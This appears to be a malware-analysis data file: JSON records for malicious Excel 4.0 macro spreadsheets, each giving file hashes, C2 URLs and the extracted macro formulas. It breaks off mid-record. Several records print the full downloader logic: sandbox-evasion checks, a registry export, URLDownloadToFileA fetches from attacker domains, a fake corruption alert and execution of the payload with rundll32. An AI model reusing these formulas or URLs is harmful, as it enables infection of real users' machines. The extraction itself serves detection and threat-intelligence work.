{"version":"0.2","sample":{"sample":"","kind":"file","target":"1fefe9e4a0ac824567b07c1dfeac2be0af959b1bc0612ecb03832a052c378761"},"analysis":{"reported":"2020-04-09T16:15:16Z","score":10},"files":[{"filename":"1fefe9e4a0ac824567b07c1dfeac2be0af959b1bc0612ecb03832a052c378761","filesize":185344,"md5":"dc1d8ac9ba63426649fd343f3e10bb7f","sha1":"6547361353c94b5e4090c0cba8a9eb0619ef59db","sha256":"1fefe9e4a0ac824567b07c1dfeac2be0af959b1bc0612ecb03832a052c378761","sha512":"b282a36bcd5c806b66620b6afa763f340fe28d5da451dbb75f4923e1cc07539cc87138621f904668c827bcb04678a588578aa3695e0e3f8d9a93d7c6a9308b61","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1fefe9e4a0ac824567b07c1dfeac2be0af959b1bc0612ecb03832a052c378761.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/DSKVJBdsj2"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1ff80c5aeff03dc83112cddf2e807c281f09a09cdd1c53de68334ee04d97d987"},"analysis":{"reported":"2020-04-09T16:15:16Z","score":10},"files":[{"filename":"1ff80c5aeff03dc83112cddf2e807c281f09a09cdd1c53de68334ee04d97d987","filesize":212992,"md5":"204400d438e9c23f4792bc1bca73de35","sha1":"b905b7146972c843a0c40a7305ed986cb0a7de29","sha256":"1ff80c5aeff03dc83112cddf2e807c281f09a09cdd1c53de68334ee04d97d987","sha512":"4b90256234c4c9a0fd9b33196b7dbadeac00cf89c5ce84ece129db703cf0e3ac5379a5d19cec9a49eebed3df9e967e40aa809ea32c1b1deae9ecf2a336edbeaa","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1ff80c5aeff03dc83112cddf2e807c281f09a09cdd1c53de68334ee04d97d987.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"lvXQLgbvza\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1fff36ca701327135f44a0904c2c41bf839d2488b1d51710ee8a6aba1870e841"},"analysis":{"reported":"2020-04-09T16:15:16Z","score":10},"files":[{"filename":"1fff36ca701327135f44a0904c2c41bf839d2488b1d51710ee8a6aba1870e841","filesize":168448,"md5":"af290188a598e95b706b411dc978479f","sha1":"efa40cf06299fb6df3314f634f09f6e401d2ae35","sha256":"1fff36ca701327135f44a0904c2c41bf839d2488b1d51710ee8a6aba1870e841","sha512":"6130c9394f7ecae4505c95482fe16c05d4a7057c06753419a507af546f515b3ea21c182eb1fa67efd07590f76e71f8e2a384713a02194630564ce8e368a05d44","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1fff36ca701327135f44a0904c2c41bf839d2488b1d51710ee8a6aba1870e841.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"qaAmLbBnG6\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2004531aa82b23e3abea5476d1a95f2c8ef9dcca336e20a0837f5df1bdf33e01"},"analysis":{"reported":"2020-04-09T16:15:16Z","score":10},"files":[{"filename":"2004531aa82b23e3abea5476d1a95f2c8ef9dcca336e20a0837f5df1bdf33e01","filesize":185344,"md5":"261a76dd41c993cecba1c3698a1e0427","sha1":"ea308496b3ad0aa6a2547ad75d8d3ca805db3ba2","sha256":"2004531aa82b23e3abea5476d1a95f2c8ef9dcca336e20a0837f5df1bdf33e01","sha512":"6555350386ea52915b964d49faca0bef84859ae635f78bfd2fc0d16d5feb8fa9ea8873a4b5a93d76f574c8e4308fc000e4c9fe3b8bf57440260dc90a7cada555","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2004531aa82b23e3abea5476d1a95f2c8ef9dcca336e20a0837f5df1bdf33e01.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"200bd05dc0699f8e652bb1f2cc8f4d3cd24ad47784063434bae1a04e73b2c590"},"analysis":{"reported":"2020-04-09T16:15:16Z","score":10},"files":[{"filename":"200bd05dc0699f8e652bb1f2cc8f4d3cd24ad47784063434bae1a04e73b2c590","filesize":167936,"md5":"4367285df4d7f1c48aa893899a630515","sha1":"0b5d1e7a8b199938c1f83cc8670a200a8d0647a0","sha256":"200bd05dc0699f8e652bb1f2cc8f4d3cd24ad47784063434bae1a04e73b2c590","sha512":"51498799b5f5a1b2ba957a4c7b4c3ad6757e112077fab87cd50b6d380312328224a261c4e75289e0be21054846b610adafb6ae1aaeb7effab60f9a2b3d07f7ce","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"200bd05dc0699f8e652bb1f2cc8f4d3cd24ad47784063434bae1a04e73b2c590.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"GAyMdRdbtf\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2010b61193bd7553da25122abd0eb70de5d1bb0c07d285b688f7d91996b96d25"},"analysis":{"reported":"2020-04-09T16:15:16Z","score":10},"files":[{"filename":"2010b61193bd7553da25122abd0eb70de5d1bb0c07d285b688f7d91996b96d25","filesize":152576,"md5":"8dc8a6738435148310c275db7c44ab4e","sha1":"e6a683320203d0d5bd3d3ac72da0bd9eb3b58b85","sha256":"2010b61193bd7553da25122abd0eb70de5d1bb0c07d285b688f7d91996b96d25","sha512":"27a873d056196b08decdbdb8c11f9debba4f8a1c997534e02f9d555bf4fb32bb22edc40a6bd15d169388fcd963157d848641cc0ce6d09ad24f1274d6556b9686","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2010b61193bd7553da25122abd0eb70de5d1bb0c07d285b688f7d91996b96d25.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/ajt1eg4fh"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/ajt1eg4fh\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Lw0AZ9bKHM\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"20227e08da5824c142d52bf11cccf9b144149d5348e9ace4db58bf3d0437df48"},"analysis":{"reported":"2020-04-09T16:15:16Z","score":10},"files":[{"filename":"20227e08da5824c142d52bf11cccf9b144149d5348e9ace4db58bf3d0437df48","filesize":171008,"md5":"98f6e9fc57809b2a23801a345ada43a5","sha1":"15756fb8b42ab9926f4265bd32acdb30fff6ab04","sha256":"20227e08da5824c142d52bf11cccf9b144149d5348e9ace4db58bf3d0437df48","sha512":"c8baf3d0d924ec80f2ff1fc2e8d927a7be16169df8a3287f80edff0344d58f0004bcfebc0d99e04708e2c8d2562f6a4a0087316fe3f4024abdc59633e61ea58d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"20227e08da5824c142d52bf11cccf9b144149d5348e9ace4db58bf3d0437df48.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ethelenecrace.xyz/fbb3"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ethelenecrace.xyz/fbb3\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"enTx0f94kt\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2025dbd77e2b689fb2325cab54ea8c25fbd5c4d65e12ff4451de94f476c2bf76"},"analysis":{"reported":"2020-04-09T16:15:16Z","score":10},"files":[{"filename":"2025dbd77e2b689fb2325cab54ea8c25fbd5c4d65e12ff4451de94f476c2bf76","filesize":142848,"md5":"e550d1e3733db2c40869d98659f54f68","sha1":"a2b61adc8b001eaf7ae6671830c9f6c94f6990f8","sha256":"2025dbd77e2b689fb2325cab54ea8c25fbd5c4d65e12ff4451de94f476c2bf76","sha512":"86b64b6d5a09f5eaf958d77373d6b4115c446a7de202449bd4fe7d7aec7c2c498a74b7ec9e88d467a19ebedc013adf65b5cf604d8e4f347b7ee9b3bd7dd04660","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2025dbd77e2b689fb2325cab54ea8c25fbd5c4d65e12ff4451de94f476c2bf76.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/fsgbfgbfsg43"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"EUvulYQvoL\",TRUE)\nRETURN()\nRETURN()\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$20C$11\u003c770,CLOSE(FALSE),)\nIF(R$21C$11\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"204265d3ece2e0f4a6c993bb18c240502088d3b8df27fb25ba0dcdb9e0f9cd6a"},"analysis":{"reported":"2020-04-09T16:15:16Z","score":10},"files":[{"filename":"204265d3ece2e0f4a6c993bb18c240502088d3b8df27fb25ba0dcdb9e0f9cd6a","filesize":144896,"md5":"79ac617302ce9c108323bd3dc33f55f0","sha1":"683af364cfe2ba56e897c9b2bae0b8fb855b87ca","sha256":"204265d3ece2e0f4a6c993bb18c240502088d3b8df27fb25ba0dcdb9e0f9cd6a","sha512":"0aedb7785886cdb1a23326c6aeddd61ac85ec019947f5464816a6483ee73c3c913db61bfa1a9f71c6fb02406f943e6ecfdb8ddab2ba21a6cfe99a06158628ab2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"204265d3ece2e0f4a6c993bb18c240502088d3b8df27fb25ba0dcdb9e0f9cd6a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/1451345341fff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2045a1037c9f1271b265bd206e0e8354b2d7261660a41fa60c9b4b9b20382159"},"analysis":{"reported":"2020-04-09T16:15:16Z","score":10},"files":[{"filename":"2045a1037c9f1271b265bd206e0e8354b2d7261660a41fa60c9b4b9b20382159","filesize":185344,"md5":"3deb57ad200f766bf2c00fcdef4b2d8c","sha1":"b11eea5e1ec5cb33dd28e250dea34adcf9a517b7","sha256":"2045a1037c9f1271b265bd206e0e8354b2d7261660a41fa60c9b4b9b20382159","sha512":"57a60777d6941a49be7361beb6483f87ba53695ae7513900e9ef26c1813b8639b6badec699ea5137aa6c14777bdbc72018235a715e5338dba99ffbda7768c4ae","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2045a1037c9f1271b265bd206e0e8354b2d7261660a41fa60c9b4b9b20382159.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2083019936dc8fe2aeef40ff2f2f46162e2ba138563b453d9f5597640438cad5"},"analysis":{"reported":"2020-04-09T16:15:16Z","score":10},"files":[{"filename":"2083019936dc8fe2aeef40ff2f2f46162e2ba138563b453d9f5597640438cad5","filesize":185344,"md5":"1fc160ef806a6d48f9be512c8cf5ca55","sha1":"6d9b9e879a9cbad133ed378df20e1c93db48063c","sha256":"2083019936dc8fe2aeef40ff2f2f46162e2ba138563b453d9f5597640438cad5","sha512":"03b23acf78dabcae32b7cbf1a9b9dbb8d30fbcf9caf720a7f21b51f34002634a812122cee7a894d639bce5677e9bce81b47210f4a71bc731f3e36af6d96160d8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2083019936dc8fe2aeef40ff2f2f46162e2ba138563b453d9f5597640438cad5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/DSKVJBdsj2"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2090e729db765a6a532a82a33cfaea1821cad52a84139a58b14e55d34af0bfce"},"analysis":{"reported":"2020-04-09T16:15:16Z","score":10},"files":[{"filename":"2090e729db765a6a532a82a33cfaea1821cad52a84139a58b14e55d34af0bfce","filesize":214016,"md5":"5408952650db4ae7e52e92224038f9e5","sha1":"4516b59d2ac8192a787a2c3c1de1b906d82718af","sha256":"2090e729db765a6a532a82a33cfaea1821cad52a84139a58b14e55d34af0bfce","sha512":"4194c1eadaa57201e9125c16f02e253b93feaeba81ab341f8f7192caa0c0cc1224e4f6f5a44f4792134d092f1ef904913a6268e9e2d815d6c9a6c136cd8fddb7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2090e729db765a6a532a82a33cfaea1821cad52a84139a58b14e55d34af0bfce.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv42g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv42g\",\"c:\\Users\\Public\\bug65ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Tm4y7QUJoD\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"20931ca9657b3db97b34970afe0575e5983d2000e5f9dc99e50cbbb3767056e7"},"analysis":{"reported":"2020-04-09T16:15:16Z","score":10},"files":[{"filename":"20931ca9657b3db97b34970afe0575e5983d2000e5f9dc99e50cbbb3767056e7","filesize":170496,"md5":"66cebe9b349df87f15582e51657b8a3b","sha1":"d6de7a961e388fc4a01307aee6132610f82cac7c","sha256":"20931ca9657b3db97b34970afe0575e5983d2000e5f9dc99e50cbbb3767056e7","sha512":"179148d64ae83e6a7150115e94ba9740467b51b57aab8c8032506512ac7bae0414469ac9af50ae3cf43e81dfda3c02d24698ababc6693a37502e2c6ee32f4850","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"20931ca9657b3db97b34970afe0575e5983d2000e5f9dc99e50cbbb3767056e7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"POAvefn5xm\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"209f745cdd7dd3ffa107b1c5db714affc3cf1c2d1c21c26a1ee16e44546d0535"},"analysis":{"reported":"2020-04-09T16:15:16Z","score":10},"files":[{"filename":"209f745cdd7dd3ffa107b1c5db714affc3cf1c2d1c21c26a1ee16e44546d0535","filesize":209920,"md5":"2e696bf3a0fc52afc98f2f6d9e1aa53c","sha1":"0cc4022639acd755f678e828f2b43d0a1ed9bed2","sha256":"209f745cdd7dd3ffa107b1c5db714affc3cf1c2d1c21c26a1ee16e44546d0535","sha512":"3e0b0c7ef094f726c5b04dec131740f8a2320fb9859f9e3b9ac99f4d64355bb3cc32eb893438bdf85c6cadb8a2638fe2b5693aff8b4d5a232581113ff42f6f96","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"209f745cdd7dd3ffa107b1c5db714affc3cf1c2d1c21c26a1ee16e44546d0535.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"39AH4J3VT9\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"20ae0d4a121a91f0e66123044a15d8c50eefe50e64803fe917cc8549750aa9e5"},"analysis":{"reported":"2020-04-09T16:15:17Z","score":10},"files":[{"filename":"20ae0d4a121a91f0e66123044a15d8c50eefe50e64803fe917cc8549750aa9e5","filesize":147968,"md5":"664a2d00610697ffcb46ea34e27a58a4","sha1":"845c3fd744a73e317d2487e2d7d1f48500db5f3f","sha256":"20ae0d4a121a91f0e66123044a15d8c50eefe50e64803fe917cc8549750aa9e5","sha512":"88529ab69a7dee893bbab5a0e62691e6e46708201dc4cc16e0614a9d3e314ce28fb5273c26c6ddbce51f57d74ba5c417cc31c4f7f9d3bccb3f0637d288a01e52","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"20ae0d4a121a91f0e66123044a15d8c50eefe50e64803fe917cc8549750aa9e5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://hxzfvomd.buzz/asf2f1ff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"azQCAY326B\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"20b67477f820ecc426eae5696c34ec46ed23042c160efd58c515afc953d0e9d9"},"analysis":{"reported":"2020-04-09T16:15:17Z","score":10},"files":[{"filename":"20b67477f820ecc426eae5696c34ec46ed23042c160efd58c515afc953d0e9d9","filesize":166912,"md5":"76fc5a9692b76e7e335082571009ec28","sha1":"1e1f37ef173ce6e5e89db53c9f219464a4961aeb","sha256":"20b67477f820ecc426eae5696c34ec46ed23042c160efd58c515afc953d0e9d9","sha512":"3655e583c0c6cd44301296e5ee0ea565de679043980946ed1804a7750fbebf1dc982bded1674c5b6ed75912840183323b5115a1acc07a9de44c20f3aa69dd691","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"20b67477f820ecc426eae5696c34ec46ed23042c160efd58c515afc953d0e9d9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), 